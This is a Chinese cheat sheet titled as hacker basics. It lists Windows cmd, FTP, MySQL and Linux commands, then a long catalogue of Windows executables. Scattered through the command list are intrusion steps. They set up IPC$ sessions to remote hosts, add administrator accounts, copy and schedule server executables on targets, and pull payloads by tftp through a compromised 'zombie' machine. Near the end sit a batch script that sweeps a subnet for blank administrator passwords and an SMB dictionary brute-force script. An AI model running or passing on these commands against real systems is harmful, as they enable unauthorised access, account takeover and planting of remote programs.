黑客基础之DOS (最齐全)
包含cmd,sql,ftp,linux,及各种简洁命令
--------------------------------------------------------------------------------
net use $">\\ip\ipc$ " " /user:" " 建立IPC空链接
net use $">\\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: $">\\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: $">\\ip\c$ 登陆后映射对方C:到本地为H:
net use $">\\ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参
数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe $">\\ip\admin$ 复制本地c:\srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy $\svv.exe">\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
print 文件名 打印文本文件
ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况
IIS服务命令:
iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)
iisreset /start或stop 启动(停止)所有Internet服务
iisreset /restart 停止然后重新启动所有Internet服务
iisreset /status 显示所有Internet服务状态
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。
FTP 命令: (后面有详细说明内容)
ftp的命令行格式为:
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。
-d 使用调试方式。
-n 限制ftp的自动登录,即不使用.netrc文件。
-g 取消全局文件名。
help [命令] 或 ?[命令] 查看命令说明
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
pwd 列出当前远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
ascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送,报警提示
cdup 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
open host[port] 建立指定ftp服务器连接,可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前FTP的状态
system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote-dir 进入远程主机目录
cdup 进入远程主机目录的父目录
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip
MYSQL 命令:
mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u与root可以不用加空格,其它也一样)
exit 退出MYSQL
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
use mysql;
show tables; 显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名; 建库
use 库名;
create table 表名 (字段设定列表); 建表
drop database 库名;
drop table 表名; 删库和删表
delete from 表名; 将表中记录清空
select * from 表名; 显示表中的记录
mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的\\mysql\\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。
win2003系统下新增命令(实用部份):
shutdown /参数 关闭或重启本地或远程主机。
参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。
例:shutdown /r /t 0 立即重启本地主机(无延时)
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。
Linux系统下基本命令: 要区分大小写
uname 显示版本信息(同win2K的 ver)
dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)
pwd 查询当前所在的目录位置
cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。
cat 文件名 查看文件内容
cat >abc.txt 往abc.txt文件中写上内容。
more 文件名 以一页一页的方式显示一个文本文件。
cp 复制文件
mv 移动文件
rm 文件名 删除文件,rm -a 目录名删除目录及子目录
mkdir 目录名 建立目录
rmdir 删除子目录,目录内没有文档。
chmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜寻
date 现在的日期、时间
who 查询目前和你使用同一台机器的人以及Login时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
groups 查看某人的Group
passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通常用它来编译C语言写的文件
su 权限转换为指定使用者
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。
ftp ftp连接上某服务器(同win2K)
附:批处理命令与变量
1:for命令及变量 基本格式:
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。
批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use $">\\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3
(set):指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1}
command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开
command_parameters:为特定命令指定参数或命令行开关
IN (set):指在(set)中取值;DO command :指执行command
参数:/L 指用增量形式{(set)为增量形式时};/F 指从文件中不断取值,直到取完为止{(set)为文件时,如(d:\pass.txt)时}。
用法举例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。
/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。
2K和XP的CMD命令教程(命令篇)
accwiz.exe > 辅助工具向导
acsetups.exe > acs setup dcom server executable
actmovie.exe > 直接显示安装工具
append.exe > 允许程序打开制定目录中的数据
arp.exe > 显示和更改计算机的ip与硬件物理地址的对应列表
at.exe > 计划运行任务
atmadm.exe > 调用管理器统计
attrib.exe > 显示和更改文件和文件夹属性
autochk.exe > 检测修复文件系统
autoconv.exe > 在启动过程中自动转化系统
autofmt.exe > 在启动过程中格式化进程
autolfn.exe > 使用长文件名格式
bootok.exe > boot acceptance application for registry
bootvrfy.exe > 通报启动成功
cacls.exe > 显示和编辑acl
calc.exe > 计算器
cdplayer.exe > cd播放器
change.exe > 与终端服务器相关的查询
charmap.exe > 字符映射表
chglogon.exe > 启动或停用会话记录
chgport.exe >
chgusr.exe > 改变用户(终端服务)
chkdsk.exe > 磁盘检测程序
chkntfs.exe > 磁盘检测程序
cidaemon.exe > 组成ci文档服务
cipher.exe > 在ntfs上显示或改变加密的文件或目录
cisvc.exe > 索引内容
ckcnv.exe > 变换cookie
cleanmgr.exe > 磁盘清理
cliconfg.exe > sql客户网络工具
clipbrd.exe > 剪贴簿查看器
clipsrv.exe > 运行clipboard服务
clspack.exe > 建立系统文件列表清单
cluster.exe > 显示域的集群
_cmd_.exe > 没什么好说的!
cmdl32.exe > 自动下载连接管理
cmmgr32.exe > 连接管理器
cmmon32.exe > 连接管理器监视
cmstp.exe > 连接管理器配置文件安装程序
comclust.exe > 集群
comp.exe > 比较两个文件和文件集的内容*
compact.exe > 显示或改变ntfs分区上文件的压缩状态
conime.exe > ime控制台
control.exe > 控制面板
convert.exe > 转换文件系统到ntfs
convlog.exe > 转换iis日志文件格式到ncsa格式
cprofile.exe > 转换显示模式
cscript.exe > 较本宿主版本
csrss.exe > 客户服务器runtime进程
csvde.exe > 日至格式转换程序
dbgtrace.exe > 和terminal server相关
dcomcnfg.exe > dcom配置属性
dcphelp.exe > ?
dcpromo.exe > ad安装向导
ddeshare.exe > dde共享
ddmprxy.exe >
debug.exe > 就是debug啦!
dfrgfat.exe > fat分区磁盘碎片整理程序
dfrgntfs.exe > ntfs分区磁盘碎片整理程序
dfs_cmd_.exe > 配置一个dfs树
dfsinit.exe > 分布式文件系统初始化
dfssvc.exe > 分布式文件系统服务器
diantz.exe > 制作cab文件
diskperf.exe > 磁盘性能计数器
dllhost.exe > 所有com+应用软件的主进程
dllhst3g.exe >
dmadmin.exe > 磁盘管理服务
dmremote.exe > 磁盘管理服务的一部分
dns.exe > dns applications dns
doskey.exe > 命令行创建宏
dosx.exe > dos扩展
dplaysvr.exe > 直接运行帮助
drwatson.exe > 华生医生错误检测
drwtsn32.exe > 华生医生显示和配置管理
dtcsetup.exe > installs mdtc
dvdplay.exe > dvd播放
dxdiag.exe > direct-x诊断工具
edlin.exe > 命令行的文本编辑器(历史悠久啊!)
edlin.exe > 命令行的文本编辑器(历史悠久啊!)
esentutl.exe > ms数据库工具
eudcedit.exe > type造字程序
eventvwr.exe > 事件查看器
evnt_cmd_.exe > event to trap translator; configuration tool
evntwin.exe > event to trap translator setup
exe2bin.exe > 转换exe文件到二进制
expand.exe > 解压缩
extrac32.exe > 解cab工具
fastopen.exe > 快速访问在内存中的硬盘文件
faxcover.exe > 传真封面编辑
faxqueue.exe > 显示传真队列
faxsend.exe > 发送传真向导
faxsvc.exe > 启动传真服务
fc.exe > 比较两个文件的不同
find.exe > 查找文件中的文本行
findstr.exe > 查找文件中的行
finger.exe > 一个用户并显示出统计结果
fixmapi.exe > 修复mapi文件
flattemp.exe > 允许或者禁用临时文件目录
fontview.exe > 显示字体文件中的字体
forcedos.exe > forces a file to start in dos mode. 强制文件在dos模式下运行
freecell.exe > popular windows game 空当接龙
ftp.exe > file transfer protocol used to transfer files over a network conne
ction 就是ftp了
gdi.exe > graphic device interface 图形界面驱动
grovel.exe >
grpconv.exe > program manager group convertor 转换程序管理员组
help.exe > displays help for windows 2000 commands 显示帮助
hostname.exe > display hostname for machine. 显示机器的hostname
ie4uinit.exe > ie5 user install tool ie5用户安装工具
ieshwiz.exe > customize folder wizard 自定义文件夹向导
iexpress.exe > create and setup packages for install 穿件安装包
iisreset.exe > restart iis admin service 重启iis服务
internat.exe > keyboard language indicator applet 键盘语言指示器
ipconfig.exe > windows 2000 ip configuration. 察看ip配置
ipsecmon.exe > ip security monitor ip安全监视器
ipxroute.exe > ipx routing and source routing control program ipx路由和源路由
控制程序
irftp.exe > setup ftp for wireless communication 无线连接
ismserv.exe > intersite messaging service 安装或者删除service control manage
r中的服务
jdbgmgr.exe > microsoft debugger for java 4 java4的调试器
jetconv.exe > convert a jet engine database 转换jet engine数据库
jetpack.exe > compact jet database. 压缩jet数据库
jview.exe > command-line loader for java java的命令行装载者
krnl386.exe > core component for windows 2000 2000的核心组件
label.exe > change label for drives 改变驱动器的卷标
lcwiz.exe > license compliance wizard for local or remote systems. 许可证符合
向导
ldifde.exe > ldif cmd line manager ldif目录交换命令行管理
licmgr.exe > terminal server license manager 终端服务许可协议管理
lights.exe > display connection status lights 显示连接状况
llsmgr.exe > windows 2000 license manager 2000许可协议管理
llssrv.exe > start the license server 启动许可协议服务器
lnkstub.exe >
locator.exe > rpc locator 远程定位
lodctr.exe > load perfmon counters 调用性能计数
logoff.exe > log current user off. 注销用户
lpq.exe > displays status of a remote lpd queue 显示远端的lpd打印队列的状态,
显示被送到基于unix的服务器的打印任务
lpr.exe > send a print job to a network printer. 重定向打印任务到网络中的打印
机。通常用于unix客户打印机将打印任务发送给连接了打印设备的nt的打印机服务器。
lsass.exe > lsa executable and server dll 运行lsa和server的dll
lserver.exe > specifies the new dns domain for the default server 指定默认se
rver新的dns域
os2.exe > an os/2 warp server (os2 /o) os/2
os2srv.exe > an os/2 warp server os/2
os2ss.exe > an os/2 warp server os/2
osk.exe > on screen keyboard 屏幕键盘
packager.exe > windows 2000 packager manager 对象包装程序
pathping.exe > combination of ping and tracert 包含ping和tracert的程序
pax.exe > is a posix program and path names used as arguments must be specif
ied in posix format. use "//c/users/default" instead of "c:\users\default."
启动便携式存档互换 (pax) 实用程序
pentnt.exe > used to check the pentium for the floating point division error
. 检查pentium的浮点错误
perfmon.exe > starts windows performance monitor 性能监视器
ping.exe > packet internet groper 验证与远程计算机的连接
posix.exe > used for backward compatibility with unix 用于兼容unix
print.exe > cmd line used to print files 打印文本文件或显示打印队列的内容。
progman.exe > program manager 程序管理器
proquota.exe > profile quota program
psxss.exe > posix subsystem application posix子系统应用程序
qappsrv.exe > displays the available application terminal servers on the net
work
在网络上显示终端服务器可用的程序
qprocess.exe > display information about processes local or remote 在本地或远
程显示进程的信息(需终端服务)
query.exe > query termserver user process and sessions 查询进程和对话
quser.exe > display information about a user logged on 显示用户登陆的信息(需
终端服务)
qwinsta.exe > display information about terminal sessions. 显示终端服务的信息
rasadmin.exe > start the remote access admin service 启动远程访问服务
rasautou.exe > creates a ras connection 建立一个ras连接
rasdial.exe > dial a connection 拨号连接
ras.exe > starts a ras connection 运行ras连接
rcp.exe > copies a file from and to a rcp service. 在 windows 2000 计算机和运
行远程外壳端口监控程序 rshd 的系统之间复制文件
rdpclip.exe > rdpclip allows you to copy and paste files between a terminal
session and client console session. 再终端和本地复制和粘贴文件
recover.exe > recovers readable information from a bad or defective disk 从坏
的或有缺陷的磁盘中恢复可读取的信息。
redir.exe > starts the redirector service 运行重定向服务
regedt32.exe > 32-bit register service 32位注册服务
regini.exe > modify registry permissions from within a script 用脚本修改注册
许可
register.exe > register a program so it can have special execution character
istics. 注册包含特殊运行字符的程序
regsvc.exe >
regsvr32.exe > registers and unregister's dll's. as to how and where it regi
ster's them i dont know. 注册和反注册dll
regtrace.exe > options to tune debug options for applications failing to dum
p trace statements
trace 设置
regwiz.exe > registration wizard 注册向导
remrras.exe >
replace.exe > replace files 用源目录中的同名文件替换目标目录中的文件。
reset.exe > reset an active section 重置活动部分
rexec.exe > runs commands on remote hosts running the rexec service. 在运行
rexec 服务的远程计算机上运行命令。rexec 命令在执行指定命令前,验证远程计算机
上的用户名,只有安装了 tcp/ip 协议后才可以使用该命令。
risetup.exe > starts the remote installation service wizard. 运行远程安装向导
服务
route.exe > display or edit the current routing tables. 控制网络路由表
routemon.exe > no longer supported 不再支持了!
router.exe > router software that runs either on a dedicated dos or on an os
/2 system. route软件在 dos或者是os/2系统
rsh.exe > runs commands on remote hosts running the rsh service 在运行 rsh 服
务的远程计算机上运行命令
rsm.exe > mounts and configures remote system media 配置远程系统媒体
rsnotify.exe > remote storage notification recall 远程存储通知回显
rsvp.exe > resource reservation protocol 源预约协议
runas.exe > run a program as another user 允许用户用其他权限运行指定的工具和
程序
rundll32.exe > launches a 32-bit dll program 启动32位dll程序
runonce.exe > causes a program to run during startup 运行程序再开始菜单中
rwinsta.exe > reset the session subsystem hardware and software to known ini
tial values 重置会话子系统硬件和软件到最初的值
savedump.exe > does not write to e:\winnt\user.dmp 不写入user.dmp中
scardsvr.exe > smart card resource management server 子能卡资源管理服务器
schupgr.exe > it will read the schema update files (.ldf files) and upgrade
the schema. (part of adsi) 读取计划更新文件和更新计划
secedit.exe > starts security editor help 自动安全性配置管理
services.exe > controls all the services 控制所有服务
sethc.exe > set high contrast - changes colours and display mode logoff to s
et it back to normal 设置高对比
setreg.exe > shows the software publishing state key values 显示软件发布的国
家语言
setup.exe > gui box prompts you to goto control panel to configure system co
mponents 安装程序(转到控制面板)
setver.exe > set version for files 设置 ms-dos 子系统向程序报告的 ms-dos 版本
号
sfc.exe > system file checker test and check system files for integrity 系统
文件检查
sfmprint.exe > print services for macintosh 打印macintosh服务
sfmpsexe.exe >
sfmsvc.exe >
shadow.exe > monitor another terminal services session. 监控另外一台中端服务
器会话
share.exe > windows 2000 和 ms-dos 子系统不使用该命令。接受该命令只是为了与
ms-dos 文件兼容
shmgrate.exe >
shrpubw.exe > create and share folders 建立和共享文件夹
sigverif.exe > file signature verification 文件签名验证
skeys.exe > serial keys utility 序列号制作工具
smlogsvc.exe > performance logs and alerts 性能日志和警报
smss.exe >
sndrec32.exe > starts the windows sound recorder 录音机
sndvol32.exe > display the current volume information 显示声音控制信息
snmp.exe > simple network management protocol used for network mangement 简单
网络管理协议
snmptrap.exe > utility used with snmp snmp工具
sol.exe > windows solitaire game 纸牌
sort.exe > compares files and folders 读取输入、排序数据并将结果写到屏幕、文
件和其他设备上
SPOOLSV.EXE > Part of the spooler service for printing 打印池服务的一部分
sprestrt.exe >
srvmgr.exe > Starts the Windows Server Manager 服务器管理器
stimon.exe > WDM StillImage- > Monitor
stisvc.exe > WDM StillImage- > Service
subst.exe > Associates a path with a drive letter 将路径与驱动器盘符关联
svchost.exe > Svchost.exe is a generic host process name for services that a
re run from dynamic-link libraries (DLLs). DLL得主进程
syncapp.exe > Creates Windows Briefcase. 创建Windows文件包
sysedit.exe > Opens Editor for 4 system files 系统配置编辑器
syskey.exe > Encrypt and secure system database NT账号数据库按群工具
sysocmgr.exe > Windows 2000 Setup 2000安装程序
systray.exe > Starts the systray in the lower right corner. 在低权限运行syst
ray
macfile.exe > Used for managing MACFILES 管理MACFILES
magnify.exe > Used to magnify the current screen 放大镜
makecab.exe > MS Cabinet Maker 制作CAB文件
mdm.exe > Machine Debug Manager 机器调试管理
mem.exe > Display current Memory stats 显示内存状态
migpwd.exe > Migrate passwords. 迁移密码
mmc.exe > Microsoft Management Console 控制台
mnmsrvc.exe > Netmeeting Remote Desktop Sharing NetMeeting远程桌面共享
mobsync.exe > Manage Synchronization. 同步目录管理器
mountvol.exe > Creates, deletes, or lists a volume mount point. 创建、删除或
列出卷的装入点。
mplay32.exe > MS Media Player 媒体播放器
mpnotify.exe > Multiple Provider Notification application 多提供者通知应用程
序
mq1sync.exe >
mqbkup.exe > MS Message Queue Backup and Restore Utility 信息队列备份和恢复工
具
mqexchng.exe > MSMQ Exchange Connector Setup 信息队列交换连接设置
mqmig.exe > MSMQ Migration Utility 信息队列迁移工具
mqsvc.exe > ?
mrinfo.exe > Multicast routing using SNMP 使用SNMP多点传送路由
mscdexnt.exe > Installs MSCD (MS CD Extensions) 安装MSCD
msdtc.exe > Dynamic Transaction Controller Console 动态事务处理控制台
msg.exe > Send a message to a user local or remote. 发送消息到本地或远程客户
mshta.exe > HTML Application HOST HTML应用程序主机
msiexec.exe > Starts Windows Installer Program 开始Windows安装程序
mspaint.exe > Microsoft Paint 画板
msswchx.exe >
mstask.exe > Task Schedule Program 任务计划表程序
mstinit.exe > Task scheduler setup 任务计划表安装
narrator.exe > Program will allow you to have a narrator for reading. Micros
oft讲述人
nbtstat.exe > Displays protocol stats and current TCP/IP connections using N
BT 使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接。
nddeapir.exe > NDDE API Server side NDDE API服务器端
net.exe > Net Utility 详细用法看/?
net1.exe > Net Utility updated version from MS Net的升级版
netdde.exe > Network DDE will install itself into the background 安装自己到后
台
netsh.exe > Creates a shell for network information 用于配置和监控 Windows 2
000 命令行脚本接口。
netstat.exe > Displays current connections. 显示协议统计和当前的 TCP/IP 网络
连接。
nlsfunc.exe > Loads country-specific information 加载特定国家(地区)的信息。
Windows 2000 和 MS-DOS 子系统不使用该命令。接受该命令只是为了与 MS-DOS 文件兼
容。
notepad.exe > Opens Windows 2000 Notepad 记事本
nslookup.exe > Displays information for DNS 该诊断工具显示来自域名系统 (DNS)
名称服务器的信息。
ntbackup.exe > Opens the NT Backup Utility 备份和故障修复工具
ntbooks.exe > Starts Windows Help Utility 帮助
ntdsutil.exe > Performs DB maintenance of the ADSI 完成ADSI的DB的维护
ntfrs.exe > NT File Replication Service NT文件复制服务
ntfrsupg.exe >
ntkrnlpa.exe > Kernel patch 核心补丁
ntoskrnl.exe > Core NT Kernel KT的核心
ntsd.exe >
ntvdm.exe > Simulates a 16-bit Windows environment 模拟16位Windows环境
nw16.exe > Netware Redirector NetWare转向器
nwscript.exe > runs netware scripts 运行Netware脚本
odbcad32.exe > ODBC 32-bit Administrator 32位ODBC管理
odbcconf.exe > Configure ODBC driver's and data source's from command line 命
令行配置ODBC驱动和数据源
taskman.exe > Task Manager 任务管理器
taskmgr.exe > Starts the Windows 2000 Task Manager 任务管理器
